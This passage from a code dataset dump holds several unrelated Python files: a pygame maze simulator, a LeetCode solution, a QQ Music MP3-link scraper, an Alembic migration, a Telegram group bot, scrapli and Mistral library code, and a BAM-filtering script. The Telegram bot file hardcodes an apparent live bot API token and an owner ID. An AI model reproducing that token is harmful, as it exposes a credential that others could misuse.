== pygame.QUIT: # If user clicked close\n done = True # Flag that we are done so we exit this loop\n \n elif event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n column = pos[0] // (WIDTH + MARGIN)\n row = pos[1] // (HEIGHT + MARGIN)\n print(row, column)\n \n if (row < 17 or column > 2) and (row > 2 or column < 12):\n cell = grid[row][column]\n cell.obstacle = 1\n print(\"Click \", pos, \"Grid coordinates: \", row, column)\n \n if 460 > pos[0] > 300 and 60 > pos[1] > 40:\n move = True\n\n if move:\n clock.tick(12)\n update_explored_cells(robot, grid)\n update_robot_dir(robot)\n robot_movement(robot)\n\n screen.fill(BLACK)\n\n for row in range(ROWS):\n for column in range(COLUMNS):\n color = WHITE\n \n if grid[row][column].obstacle == 1:\n color = RED\n \n for r in range(row - 1, row + 2):\n for c in range(column - 1, column + 2):\n if r < 0 or r >= ROWS or c < 0 or c >= COLUMNS:\n continue\n \n if grid[r][c].obstacle == 0:\n grid[r][c].virtual_wall = 1\n \n elif grid[row][column].virtual_wall == 1:\n color = GREY\n\n else:\n if grid[row][column].explored == 1:\n color = ORANGE\n \n pygame.draw.rect(screen, color,\n [(MARGIN + WIDTH) * column + MARGIN,\n (MARGIN + HEIGHT) * row + MARGIN,\n WIDTH, HEIGHT])\n\n # start\n pygame.draw.rect(screen, GREEN,\n [MARGIN, (MARGIN + HEIGHT) * 17 + MARGIN, WIDTH * 3 + MARGIN * 2, HEIGHT * 3 + MARGIN * 2])\n\n # goal\n pygame.draw.rect(screen, YELLOW,\n [(MARGIN + WIDTH) * 12 + MARGIN, MARGIN, WIDTH * 3 + MARGIN * 2, HEIGHT * 3 + MARGIN * 2])\n\n # robot\n pygame.draw.rect(screen, BLUE,\n [(MARGIN + WIDTH) * (robot.column - 1) + MARGIN,\n (MARGIN + HEIGHT) * (robot.row - 1) + MARGIN,\n WIDTH * 3 + MARGIN * 2, HEIGHT * 3 + MARGIN * 2])\n\n # button\n pygame.draw.rect(screen, WHITE, (380, 40, 80, 20))\n screen.blit(text, (405, 45))\n clock.tick(60)\n pygame.display.flip()\n\npygame.quit()\n","sub_path":"src/Maze.py","file_name":"Maze.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"520239168","text":"#\r\n# @lc app=leetcode id=1124 lang=python3\r\n#\r\n# [1124] Longest Well-Performing Interval\r\n#\r\n# https://leetcode.com/problems/longest-well-performing-interval/description/\r\n#\r\n# algorithms\r\n# Medium (29.42%)\r\n# Likes: 147\r\n# Dislikes: 40\r\n# Total Accepted: 4.4K\r\n# Total Submissions: 14.8K\r\n# Testcase Example: '[9,9,6,0,6,6,9]'\r\n#\r\n# We are given hours, a list of the number of hours worked per day for a given\r\n# employee.\r\n#\r\n# A day is considered to be a tiring day if and only if the number of hours\r\n# worked is (strictly) greater than 8.\r\n#\r\n# A well-performing interval is an interval of days for which the number of\r\n# tiring days is strictly larger than the number of non-tiring days.\r\n#\r\n# Return the length of the longest well-performing interval.\r\n#\r\n#\r\n# Example 1:\r\n#\r\n#\r\n# Input: hours = [9,9,6,0,6,6,9]\r\n# Output: 3\r\n# Explanation: The longest well-performing interval is [9,9,6].\r\n#\r\n#\r\n#\r\n# Constraints:\r\n#\r\n#\r\n# 1 <= hours.length <= 10000\r\n# 0 <= hours[i] <= 16\r\n#\r\n#\r\n#\r\nfrom collections import defaultdict\r\n\r\n\r\nclass Solution:\r\n def longestWPI(self, hours) -> int:\r\n # 1. store dict of each diff's left and right index\r\n d = {}\r\n diff = 0\r\n for i, h in enumerate(hours):\r\n if h > 8:\r\n diff += 1\r\n else:\r\n diff -= 1\r\n if diff not in d:\r\n d[diff] = [i, i]\r\n d[diff][-1] = i\r\n minIndex = len(hours)\r\n res = 0\r\n # 2. store the current min left index\r\n # 3. if diff<=0: res=max(res, right-minIndex); else: res=max(res,right)\r\n for k in sorted(d.keys()):\r\n if k <= 0:\r\n res = max(res, d[k][1]-minIndex)\r\n else:\r\n res = max(res, d[k][1] + 1)\r\n minIndex = min(minIndex, d[k][0])\r\n return res\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(Solution().longestWPI([6, 6, 9]))\r\n","sub_path":"Medium/1124.longest-well-performing-interval.py","file_name":"1124.longest-well-performing-interval.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"492516693","text":"from selenium import webdriver\nimport requests\nimport json\n\ndic = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'\n}\ndriver = webdriver.Chrome(r'chromedriver.exe')\n\n\ndef get_music(msg):\n url1 = f'https://y.qq.com/portal/search.html#page=1&searchid=1&remoteplace=txt.yqq.top&t=song&w={msg}'\n driver.get(url1)\n driver.implicitly_wait(5) # 5秒钟之内元素加载完即可,智能等待\n data = driver.find_element_by_xpath('//*[@id=\"song_box\"]/div[2]/ul[2]/li[1]/div/div[2]/span[1]/a').get_attribute('href')\n # print(data)\n data = {\"mid\":data}\n\n url2 = 'http://www.douqq.com/qqmusic/qqapi.php'\n req = requests.post(url2, data=data,headers=dic).text\n req = req.replace(\"\\\\\",'')\n req = req.strip('\"')\n req = json.loads(req)\n return req['mp3_l']\n\n","sub_path":"qq_music.py","file_name":"qq_music.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"524677051","text":"\"\"\"initial commit\n\nRevision ID: 212f73d1fd15\nRevises: None\nCreate Date: 2014-10-01 18:19:21.649383\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '212f73d1fd15'\ndown_revision = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('loglevels',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('eventstatus',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('events',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('host', sa.String(length=256), nullable=True),\n sa.Column('pathname', sa.String(length=256), nullable=True),\n sa.Column('message', sa.UnicodeText(), nullable=True),\n sa.Column('user', sa.Integer(), nullable=True),\n sa.Column('time', sa.DateTime(), nullable=True),\n sa.Column('level_id', sa.Integer(), nullable=True),\n sa.Column('status_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['level_id'], ['loglevels.id'], ),\n sa.ForeignKeyConstraint(['status_id'], ['eventstatus.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('events')\n op.drop_table('eventstatus')\n op.drop_table('loglevels')\n ### end Alembic commands ###\n","sub_path":"appen_dashboard/migrations/versions/212f73d1fd15_initial_commit.py","file_name":"212f73d1fd15_initial_commit.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"329786354","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport sys,redis,re,time\r\nreload(sys)\r\nsys.setdefaultencoding(\"utf-8\")\r\nfrom telebot import TeleBot, types \r\n\r\nTOKEN = '403206452:AAGdunivaXO6ujyEsadcX5sbm_AqlOuD8mU' #yourbottokenkey\r\nnaji = 296805034 #yourid\r\n\r\nbot = TeleBot(TOKEN,threaded=False)\r\nredis = redis.StrictRedis(host='localhost', port=6379, db=9, decode_responses=True)\r\nbot_id = bot.get_me().id\r\n\r\ndef allowed(msg) :\r\n\tadmin = bot.get_chat_member(msg.chat.id, msg.from_user.id)\r\n\tif admin.status == 'creator' or admin.status == 'administrator':\r\n\t\t\treturn True\r\n\telif msg.from_user.id == naji:\r\n\t\treturn True\r\n\telif int(redis.hget(msg.chat.id, msg.from_user.id) or 0) > int(redis.hget(msg.chat.id, \"limit\") or 1) :\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n\t\t\r\ndef gp(msg) : \r\n\treturn msg.chat.type == 'supergroup' or msg.chat.type == 'group'\r\ndef pv(msg) : \r\n\treturn msg.chat.type == 'private'\r\n\r\n@bot.message_handler(func=pv, content_types=['text', 'audio', 'document', 'gif', 'photo', 'sticker', 'video', 'voice', 'location', 'contact','game','video_note'])\r\ndef personal(msg):\r\n\ttry:\r\n\t\tif msg.from_user.id == naji and msg.text:\r\n\t\t\tif re.match(\"/fwd\", msg.text) and msg.reply_to_message:\r\n\t\t\t\tfor i in redis.smembers(\"bot:all\", msg.chat.id):\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tbot.forward_message(i, msg.chat.id, msg.reply_to_message.id)\r\n\t\t\t\t\texcept Exception as e:\r\n\t\t\t\t\t\tprint(e)\r\n\t\t\t\t\t\t\r\n\t\t\tif re.match(\"/stats\", msg.text):\r\n\t\t\t\tbot.send_message(msg.chat.id, \"آمار\\nگروه ها : {}\\nخصوصی ها : {}\".format(redis.scard(\"bot:gps\"), redis.scard(\"bot:pvs\")))\r\n\t\telse:\r\n\t\t\tbot.send_message(msg.chat.id,\"رباتی برای افزایش اعضای گروه\\nفقط کافیه به گروهت دعوتش کنی و ادمینش کنی\")\r\n\t\t\tif not redis.sismember(\"bot:all\", msg.chat.id):\r\n\t\t\t\tredis.sadd(\"bot:pvs\", msg.chat.id)\r\n\t\t\t\tredis.sadd(\"bot:all\", msg.chat.id)\r\n\t\t\t\r\n\texcept Exception as e:\r\n\t\tprint(e)\r\n\t\tpass\r\n\t\r\n\t\r\n@bot.message_handler(func=gp, content_types=['text', 'audio', 'document', 'gif', 'photo', 'sticker', 'video', 'voice', 'location', 'contact','game','video_note'])\r\ndef main(msg):\r\n\tif not redis.sismember(\"bot:all\", msg.chat.id):\r\n\t\tredis.sadd(\"bot:gps\", msg.chat.id)\r\n\t\tredis.sadd(\"bot:all\", msg.chat.id)\r\n\ttry:\r\n\t\tif msg.text and re.match(\"^[!#/][Ss]etlimit\", msg.text):\r\n\t\t\tadmin = bot.get_chat_member(msg.chat.id, msg.from_user.id)\r\n\t\t\tmax = re.search(\"(\\d+)\", msg.text).group(1)\r\n\t\t\tif (admin and admin.status == 'creator' or msg.from_user.id == naji) and max:\r\n\t\t\t\tredis.hset(msg.chat.id, \"limit\", int(max))\r\n\t\t\t\tbot.reply_to(msg, \"🍃 افزودن {} عضو جهت رفع محدودیت در گفتوگو ثبت شد 🍃\".format(max))\r\n\t\t\r\n\t\tif not allowed(msg):\r\n\t\t\tname = msg.from_user.last_name and msg.from_user.first_name + msg.from_user.last_name or msg.from_user.first_name\r\n\t\t\ttry:\r\n\t\t\t\tif redis.hget(msg.from_user.id, msg.chat.id):\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tbot.delete_message(msg.chat.id, redis.hget(msg.from_user.id, msg.chat.id))\r\n\t\t\t\t\texcept Exception as e:\r\n\t\t\t\t\t\tprint(e)\r\n\t\t\t\tbot.delete_message(msg.chat.id, msg.message_id)\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint(e)\r\n\t\t\t\treturn \"\"\r\n\t\t\tfinally:\r\n\t\t\t\tpm = bot.send_message(msg.chat.id, \"🌺 کاربر عزیز {} 🌺\\nهر عضو گروه موظفه {} نفرو به گروه اضافه کنه تا بتونه چت کنه 😅\\n\\nتعداد اعضا افزوده شده توسط شما : 💫 {}💫\".format(name, redis.hget(msg.chat.id, \"limit\") or 1, redis.hget(msg.chat.id, msg.from_user.id) or 0))\r\n\t\t\t\tredis.hset(msg.from_user.id, msg.chat.id, pm.message_id)\r\n\texcept Exception as e:\r\n\t\tprint(e)\r\n\t\tpass\r\n\t\t\r\n@bot.message_handler(content_types=['new_chat_members', 'left_chat_member'])\r\ndef add(msg):\r\n\tif msg.left_chat_member:\r\n\t\tredis.hdel(msg.chat.id, msg.left_chat_member.id)\r\n\telif msg.new_chat_members:\r\n\t\tfor user in msg.new_chat_members:\r\n\t\t\tif 'username' in user and user['username'].lower().endswith(\"bot\"):\r\n\t\t\t\treturn\r\n\t\t\telse:\r\n\t\t\t\tredis.hincrby(msg.chat.id, msg.from_user.id, 1)\r\n\r\nbot.polling(none_stop=True)\t","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"51766927","text":"\"\"\"scrapli.driver.base.async_driver\"\"\"\nfrom types import TracebackType\nfrom typing import Any, Optional, Type\n\nfrom scrapli.channel import AsyncChannel\nfrom scrapli.driver.base.base_driver import BaseDriver\nfrom scrapli.exceptions import ScrapliValueError\nfrom scrapli.transport import ASYNCIO_TRANSPORTS\n\n\nclass AsyncDriver(BaseDriver):\n def __init__(self, **kwargs: Any):\n super().__init__(**kwargs)\n\n if self.transport_name not in ASYNCIO_TRANSPORTS:\n raise ScrapliValueError(\n \"provided transport is *not* an asyncio transport, must use an async transport with\"\n \" the AsyncDriver(s)\"\n )\n\n self.channel = AsyncChannel(\n transport=self.transport,\n base_channel_args=self._base_channel_args,\n )\n\n async def __aenter__(self) -> \"AsyncDriver\":\n \"\"\"\n Enter method for context manager\n\n Args:\n N/A\n\n Returns:\n AsyncDriver: opened AsyncDriver object\n\n Raises:\n N/A\n\n \"\"\"\n await self.open()\n return self\n\n async def __aexit__(\n self,\n exception_type: Optional[Type[BaseException]],\n exception_value: Optional[BaseException],\n traceback: Optional[TracebackType],\n ) -> None:\n \"\"\"\n Exit method to cleanup for context manager\n\n Args:\n exception_type: exception type being raised\n exception_value: message from exception being raised\n traceback: traceback from exception being raised\n\n Returns:\n None\n\n Raises:\n N/A\n\n \"\"\"\n await self.close()\n\n async def open(self) -> None:\n \"\"\"\n Open the scrapli connection\n\n Args:\n N/A\n\n Returns:\n None\n\n Raises:\n N/A\n\n \"\"\"\n self._pre_open_closing_log(closing=False)\n\n await self.transport.open()\n\n if (\n self.transport_name\n in (\n \"telnet\",\n \"asynctelnet\",\n )\n and not self.auth_bypass\n ):\n await self.channel.channel_authenticate_telnet(\n auth_username=self.auth_username, auth_password=self.auth_password\n )\n\n if self.on_open:\n await self.on_open(self)\n\n self._post_open_closing_log(closing=False)\n\n async def close(self) -> None:\n \"\"\"\n Close the scrapli connection\n\n Args:\n N/A\n\n Returns:\n None\n\n Raises:\n N/A\n\n \"\"\"\n self._post_open_closing_log(closing=True)\n\n if self.on_close:\n await self.on_close(self)\n\n if self.channel.channel_log:\n self.channel.channel_log.close()\n\n self.transport.close()\n\n self._post_open_closing_log(closing=True)\n","sub_path":"venv/Lib/site-packages/scrapli/driver/base/async_driver.py","file_name":"async_driver.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"292533009","text":"# Copyright 2014 - Mirantis, Inc.\n# Copyright 2015 - StackStorm, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom mistral.db.v2 import api as db_api\nfrom mistral.engine1 import base\nfrom mistral.engine1 import rpc\nfrom mistral import expressions\nfrom mistral.services import scheduler\nfrom mistral.utils import wf_trace\nfrom mistral.workflow import data_flow\nfrom mistral.workflow import states\nfrom mistral.workflow import utils\n\n\n_ENGINE_CLIENT_PATH = 'mistral.engine1.rpc.get_engine_client'\n\n\ndef _log_task_delay(task_db, delay_sec):\n wf_trace.info(\n task_db,\n \"Task '%s' [%s -> %s, delay = %s sec]\" %\n (task_db.name, task_db.state, states.DELAYED, delay_sec)\n )\n\n\ndef build_policies(policies_spec, wf_spec):\n task_defaults = wf_spec.get_task_defaults()\n wf_policies = task_defaults.get_policies() if task_defaults else None\n\n if not (policies_spec or wf_policies):\n return []\n\n return construct_policies_list(policies_spec, wf_policies)\n\n\ndef get_policy_factories():\n return [\n build_wait_before_policy,\n build_wait_after_policy,\n build_retry_policy,\n build_timeout_policy,\n build_pause_before_policy,\n build_concurrency_policy\n ]\n\n\ndef construct_policies_list(policies_spec, wf_policies):\n policies = []\n\n for factory in get_policy_factories():\n policy = factory(policies_spec)\n\n if wf_policies and not policy:\n policy = factory(wf_policies)\n\n if policy:\n policies.append(policy)\n\n return policies\n\n\ndef build_wait_before_policy(policies_spec):\n if not policies_spec:\n return None\n\n wait_before = policies_spec.get_wait_before()\n\n return WaitBeforePolicy(wait_before) if wait_before > 0 else None\n\n\ndef build_wait_after_policy(policies_spec):\n if not policies_spec:\n return None\n\n wait_after = policies_spec.get_wait_after()\n\n return WaitAfterPolicy(wait_after) if wait_after > 0 else None\n\n\ndef build_retry_policy(policies_spec):\n if not policies_spec:\n return None\n\n retry = policies_spec.get_retry()\n\n if not retry:\n return None\n\n return RetryPolicy(\n retry.get_count(),\n retry.get_delay(),\n retry.get_break_on()\n )\n\n\ndef build_timeout_policy(policies_spec):\n if not policies_spec:\n return None\n\n timeout_policy = policies_spec.get_timeout()\n\n return TimeoutPolicy(timeout_policy) if timeout_policy > 0 else None\n\n\ndef build_pause_before_policy(policies_spec):\n if not policies_spec:\n return None\n\n pause_before_policy = policies_spec.get_pause_before()\n\n return (PauseBeforePolicy(pause_before_policy)\n if pause_before_policy else None)\n\n\ndef build_concurrency_policy(policies_spec):\n if not policies_spec:\n return None\n\n concurrency_policy = policies_spec.get_concurrency()\n\n return (ConcurrencyPolicy(concurrency_policy)\n if concurrency_policy else None)\n\n\ndef _ensure_context_has_key(runtime_context, key):\n if not runtime_context:\n runtime_context = {}\n\n if key not in runtime_context:\n runtime_context.update({key: {}})\n\n return runtime_context\n\n\nclass WaitBeforePolicy(base.TaskPolicy):\n def __init__(self, delay):\n self.delay = delay\n\n def before_task_start(self, task_db, task_spec):\n data_flow.evaluate_policy_params(self, task_db.in_context)\n context_key = 'wait_before_policy'\n\n runtime_context = _ensure_context_has_key(\n task_db.runtime_context,\n context_key\n )\n\n task_db.runtime_context = runtime_context\n\n policy_context = runtime_context[context_key]\n\n if policy_context.get('skip'):\n # Unset state 'DELAYED'.\n wf_trace.info(\n task_db,\n \"Task '%s' [%s -> %s]\"\n % (task_db.name, states.DELAYED, states.RUNNING)\n )\n\n task_db.state = states.RUNNING\n\n return\n\n policy_context.update({'skip': True})\n\n _log_task_delay(task_db, self.delay)\n\n task_db.state = states.DELAYED\n\n scheduler.schedule_call(\n _ENGINE_CLIENT_PATH,\n 'run_task',\n self.delay,\n task_id=task_db.id\n )\n\n\nclass WaitAfterPolicy(base.TaskPolicy):\n def __init__(self, delay):\n self.delay = delay\n\n def after_task_complete(self, task_db, task_spec, result):\n data_flow.evaluate_policy_params(self, task_db.in_context)\n context_key = 'wait_after_policy'\n\n runtime_context = _ensure_context_has_key(\n task_db.runtime_context,\n context_key\n )\n\n task_db.runtime_context = runtime_context\n\n policy_context = runtime_context[context_key]\n\n if policy_context.get('skip'):\n # Need to avoid terminal states.\n if not states.is_completed(task_db.state):\n # Unset state 'DELAYED'.\n\n wf_trace.info(\n task_db,\n \"Task '%s' [%s -> %s]\"\n % (task_db.name, states.DELAYED, states.RUNNING)\n )\n\n task_db.state = states.RUNNING\n\n return\n\n policy_context.update({'skip': True})\n\n _log_task_delay(task_db, self.delay)\n\n # Set task state to 'DELAYED'.\n task_db.state = states.DELAYED\n\n serializers = {\n 'result': 'mistral.workflow.utils.TaskResultSerializer'\n }\n\n scheduler.schedule_call(\n _ENGINE_CLIENT_PATH,\n 'on_task_result',\n self.delay,\n serializers,\n task_id=task_db.id,\n result=result\n )\n\n\nclass RetryPolicy(base.TaskPolicy):\n def __init__(self, count, delay, break_on):\n self.count = count\n self.delay = delay\n self.break_on = break_on\n\n def after_task_complete(self, task_db, task_spec, result):\n \"\"\"Possible Cases:\n\n 1. state = SUCCESS\n No need to move to next iteration.\n 2. retry:count = 5, current:count = 2, state = ERROR,\n state = IDLE/DELAYED, current:count = 3\n 3. retry:count = 5, current:count = 4, state = ERROR\n Iterations complete therefore state = #{state}, current:count = 4.\n \"\"\"\n data_flow.evaluate_policy_params(self, task_db.in_context)\n context_key = 'retry_task_policy'\n\n runtime_context = _ensure_context_has_key(\n task_db.runtime_context,\n context_key\n )\n\n task_db.runtime_context = runtime_context\n\n state = states.ERROR if result.is_error() else states.SUCCESS\n\n if state != states.ERROR:\n return\n\n wf_trace.info(\n task_db,\n \"Task '%s' [%s -> ERROR]\"\n % (task_db.name, task_db.state)\n )\n\n outbound_context = task_db.result\n\n policy_context = runtime_context[context_key]\n\n retry_no = 0\n\n if 'retry_no' in policy_context:\n retry_no = policy_context['retry_no']\n del policy_context['retry_no']\n\n retries_remain = retry_no + 1 < self.count\n\n break_early = (\n expressions.evaluate(self.break_on, outbound_context)\n if self.break_on and outbound_context else False\n )\n\n if not retries_remain or break_early:\n return\n\n _log_task_delay(task_db, self.delay)\n\n task_db.state = states.DELAYED\n\n policy_context['retry_no'] = retry_no + 1\n runtime_context[context_key] = policy_context\n\n scheduler.schedule_call(\n _ENGINE_CLIENT_PATH,\n 'run_task',\n self.delay,\n task_id=task_db.id\n )\n\n\nclass TimeoutPolicy(base.TaskPolicy):\n def __init__(self, timeout_sec):\n self.delay = timeout_sec\n\n def before_task_start(self, task_db, task_spec):\n data_flow.evaluate_policy_params(self, task_db.in_context)\n\n scheduler.schedule_call(\n None,\n 'mistral.engine1.policies.fail_task_if_incomplete',\n self.delay,\n task_id=task_db.id,\n timeout=self.delay\n )\n\n wf_trace.info(\n task_db,\n \"Timeout check scheduled [task=%s, timeout(s)=%s].\" %\n (task_db.id, self.delay)\n )\n\n\nclass PauseBeforePolicy(base.TaskPolicy):\n def __init__(self, expression):\n self.expr = expression\n\n def before_task_start(self, task_db, task_spec):\n data_flow.evaluate_policy_params(self, task_db.in_context)\n\n if not expressions.evaluate(self.expr, task_db.in_context):\n return\n\n wf_trace.info(\n task_db,\n \"Workflow paused before task '%s' [%s -> %s]\" %\n (task_db.name, task_db.execution.state, states.PAUSED)\n )\n\n task_db.execution.state = states.PAUSED\n task_db.state = states.IDLE\n\n\nclass ConcurrencyPolicy(base.TaskPolicy):\n def __init__(self, concurrency):\n self.concurrency = concurrency\n\n def before_task_start(self, task_db, task_spec):\n data_flow.evaluate_policy_params(self, task_db.in_context)\n context_key = 'concurrency'\n\n runtime_context = _ensure_context_has_key(\n task_db.runtime_context,\n context_key\n )\n\n runtime_context[context_key] = self.concurrency\n task_db.runtime_context = runtime_context\n\n\ndef fail_task_if_incomplete(task_id, timeout):\n task_db = db_api.get_task(task_id)\n\n if not states.is_completed(task_db.state):\n msg = \"Task timed out [task=%s, timeout(s)=%s].\" % (task_id, timeout)\n\n wf_trace.info(task_db, msg)\n\n wf_trace.info(\n task_db,\n \"Task '%s' [%s -> ERROR]\"\n % (task_db.name, task_db.state)\n )\n\n rpc.get_engine_client().on_task_result(\n task_id,\n utils.TaskResult(error=msg)\n )\n","sub_path":"mistral/engine1/policies.py","file_name":"policies.py","file_ext":"py","file_size_in_byte":10461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"417165539","text":"from PIL import Image\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom PCV.tools import imtools, pca\n\n# Get list of images and their size\nimlist = imtools.get_imlist('../data/fontimages/') # fontimages.zip is part of the book data set\nim = np.array(Image.open(imlist[0])) # open one image to get the size\nm, n = im.shape[:2]\n\n# Create matrix to store all flattened images\nimmatrix = np.array([np.array(Image.open(imname)).flatten() for imname in imlist], 'f')\n\n# Perform PCA\nV, S, immean = pca.pca(immatrix)\n\n# Show the images (mean and 7 first modes)\n# This gives figure 1-8 (p15) in the book.\nplt.figure()\nplt.gray()\nplt.subplot(2, 4, 1)\nplt.imshow(immean.reshape(m, n))\nfor i in range(7):\n plt.subplot(2, 4, i + 2)\n plt.imshow(V[i].reshape(m, n))\nplt.show()\n","sub_path":"examples/ch1_3_pca_graylevel.py","file_name":"ch1_3_pca_graylevel.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"461182758","text":"\n# get filtered bam of different species for other analysis\n# bsub_script='bsub -q Z-ZQF -n 10 '\n\nfrom process_atac import split_bam\nfrom multiprocessing import Process\nimport pysam\nimport os\n\n\ndef get_filtered_bc(filtered_cell_file):\n bc_list=[]\n with open(filtered_cell_file) as input:\n input.readline()\n for line in input:\n bc=line.rstrip('\\n').split(',')[0]\n bc_list.append(bc)\n return bc_list\n\n\ndef get_bc_umi(bc_list, assignment_file):\n bc_umi={}\n for bc in bc_list:\n bc_umi[bc]=[]\n with open(assignment_file) as input:\n input.readline()\n for line in input:\n items=line.rstrip('\\n').split(',')\n bc=items[0]\n umi=items[4]\n if bc in bc_umi.keys():\n bc_umi[bc].append(umi)\n return bc_umi\n\n\ndef filter_chunk(output_dir,sample,bc_umi,config,chunk=None):\n\t# filter by read quality and filtered barcode\n\t# keep the longest read for each umi\n\n\tmin_mapq=config.min_mapq\n\tmax_flen=config.max_flen\n\n\tif chunk is None:\n\t\tbamfile = output_dir + '/mapping/'+sample+ '.Aligned.sorted.bam'\n\t\toutput_filename = output_dir +'/atac_qc/'+sample+ '_filtered.bam'\n\telse:\n\t\tbamfile = output_dir +'/mapping/'+sample+ '.Aligned.sorted.chunk%d.bam' %chunk\n\t\toutput_filename = output_dir +'/atac_qc/'+sample+ '_filtered.chunk%d.bam' %chunk\n\n\tinbam=pysam.Samfile(bamfile)\n\tfiltered_bam = pysam.Samfile(output_filename, \"wb\", template=inbam)\n\t\n\tbc_prev=''\n\tumi_prev=''\n\tseqname_prev=''\n\tfor read in inbam:\n\t\trname = str(read.reference_name)\n\t\tif read.is_unmapped or read.mate_is_unmapped or (\"chrM\" in rname) or read.is_secondary: continue\n\t\tif read.is_proper_pair and (abs(read.isize) <= max_flen) and (read.mapq >= min_mapq):\n\t\t\tif read.is_read1:\n\t\t\t\tseqname=read.qname\n\t\t\t\tbc=seqname.split('_')[-1].split(':')[0]\n\t\t\t\tumi=seqname.split(':')[1]\n\t\t\t\tif bc in bc_umi.keys():\n\t\t\t\t\tif umi in bc_umi[bc]:\n\t\t\t\t\t\tif (bc,umi)!=(bc_prev,umi_prev): # keep the first read pair for each umi\n\t\t\t\t\t\t\tfiltered_bam.write(read)\n\t\t\t\t\t\t\t#filtered_bam.write(inbam.mate(read))\n\t\t\t\t\t\t\tbc_prev=bc\n\t\t\t\t\t\t\tumi_prev=umi\n\t\t\t\t\t\t\tseqname_prev=seqname\n\t\t\telif read.is_read2: # write read2 if read1 is written\n\t\t\t\tseqname=read.qname\n\t\t\t\tif seqname==seqname_prev:\n\t\t\t\t\tfiltered_bam.write(read)\n\tfiltered_bam.close()\n\tinbam.close()\n\n\ndef join_bam(output_dir,sample,nthreads):\n filenames = [output_dir +'/atac_qc/'+sample+ '_filtered.chunk%d.bam' %i for i in range(1,nthreads+1)]\n inbam=pysam.Samfile(output_dir + '/mapping/'+sample+ '.Aligned.sorted.bam')\n outbam=pysam.Samfile(output_dir + '/atac_qc/'+sample+ '_filtered.bam', \"wb\", template=inbam) #,header=inbam.header\n inbam.close()\n for f in filenames:\n \tinbam=pysam.Samfile(f)\n \tfor read in inbam:\n \t\toutbam.write(read)\n \tinbam.close()\n outbam.close()\n \n\ndef filter_bam(output_dir, sample, config, nthreads):\n\t\"\"\" Gets molecular info for a bam file. Splits the bamfile into \n\tnthread chunks and runs in parallel \"\"\"\n\tnthreads = int(nthreads)\n\tsplit_bam(output_dir, sample, nthreads)\n\n\tfiltered_cell_file=output_dir+'/DGE_filtered/'+sample+'_cell_metadata.csv'\n\tassignment_file=output_dir+'/molecule_info/'+sample+'_read_assignment.csv'\n\n\tbc_list=get_filtered_bc(filtered_cell_file)\n\tbc_umi=get_bc_umi(bc_list, assignment_file)\n\n\tPros = []\n\tfor i in range(1,nthreads+1):\n\t\tprint('Starting thread %d' %i)\n\t\tp = Process(target=filter_chunk, args=(output_dir,sample,bc_umi, config, i))\n\t\tPros.append(p)\n\t\tp.start()\n\tfor t in Pros:\n\t\tt.join() \n\n\tjoin_bam(output_dir,sample,nthreads)\n\n\tfor i in range(1,int(nthreads)+1):\n\t\tos.remove(output_dir +'/mapping/'+sample+ '.Aligned.sorted.chunk%d.bam' %i)\n\t\tos.remove(output_dir +'/atac_qc/'+sample+ '_filtered.chunk%d.bam' %i)\n\n\n\nif __name__ == '__main__':\n\timport sys\n\t\n\toutput_dir=sys.argv[1]\n\tsample=sys.argv[2]\n\tnthreads=sys.argv[3]\n\t#nthreads=4\n\tfilter_bam(output_dir,sample,int(nthreads))\n\n","sub_path":"scAR_process/filter_bam.py","file_name":"filter_bam.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"262703662","text":"\"\"\"View tests\"\"\"\nimport requests_mock\nfrom django.urls import reverse\n\nfrom gameMuster.tests.base_test import BaseTest\nfrom gameMuster.models import Platform, 